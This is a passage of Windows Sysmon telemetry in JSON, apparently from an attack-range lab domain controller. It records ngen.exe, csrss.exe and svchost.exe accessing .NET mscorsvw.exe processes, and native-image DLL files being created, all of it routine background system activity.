C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:02.840","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051E-5F25-0000-0010907A1300}","TargetProcessId":"3928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8266,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:01:02.965\r\nProcessGuid: {A837DB8D-051E-5F25-0000-0010907A1300}\r\nProcessId: 3928\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\f58-0\\System.Configuration.Install.dll\r\nCreationUtcTime: 2020-08-01 06:01:02.965","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:01:02.965","ProcessGuid":"{A837DB8D-051E-5F25-0000-0010907A1300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\f58-0\\System.Configuration.Install.dll","CreationUtcTime":"2020-08-01 06:01:02.965","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8267,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:03.012\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0515-5F25-0000-0010C8261300}\r\nTargetProcessId: 4272\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:03.012","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0515-5F25-0000-0010C8261300}","TargetProcessId":"4272","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8268,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:03.012\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0515-5F25-0000-0010C8261300}\r\nTargetProcessId: 4272\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:03.012","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0515-5F25-0000-0010C8261300}","TargetProcessId":"4272","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8269,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:03.012\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0515-5F25-0000-0010C8261300}\r\nTargetProcessId: 4272\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:03.012","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0515-5F25-0000-0010C8261300}","TargetProcessId":"4272","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8270,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:03.122\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051F-5F25-0000-00107C821300}\r\nTargetProcessId: 1656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:03.122","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051F-5F25-0000-00107C821300}","TargetProcessId":"1656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8271,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:03.122\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051F-5F25-0000-00107C821300}\r\nTargetProcessId: 1656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:03.122","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051F-5F25-0000-00107C821300}","TargetProcessId":"1656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8272,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:03.137\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051F-5F25-0000-00107C821300}\r\nTargetProcessId: 1656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:03.137","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051F-5F25-0000-00107C821300}","TargetProcessId":"1656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8273,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:01:04.122\r\nProcessGuid: {A837DB8D-051F-5F25-0000-00107C821300}\r\nProcessId: 1656\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\678-0\\System.Xaml.dll\r\nCreationUtcTime: 2020-08-01 06:01:04.122","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:01:04.122","ProcessGuid":"{A837DB8D-051F-5F25-0000-00107C821300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\678-0\\System.Xaml.dll","CreationUtcTime":"2020-08-01 06:01:04.122","EventReceivedTime":"2020-08-01 06:01:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8274,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:04.200\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0520-5F25-0000-00104D861300}\r\nTargetProcessId: 2840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 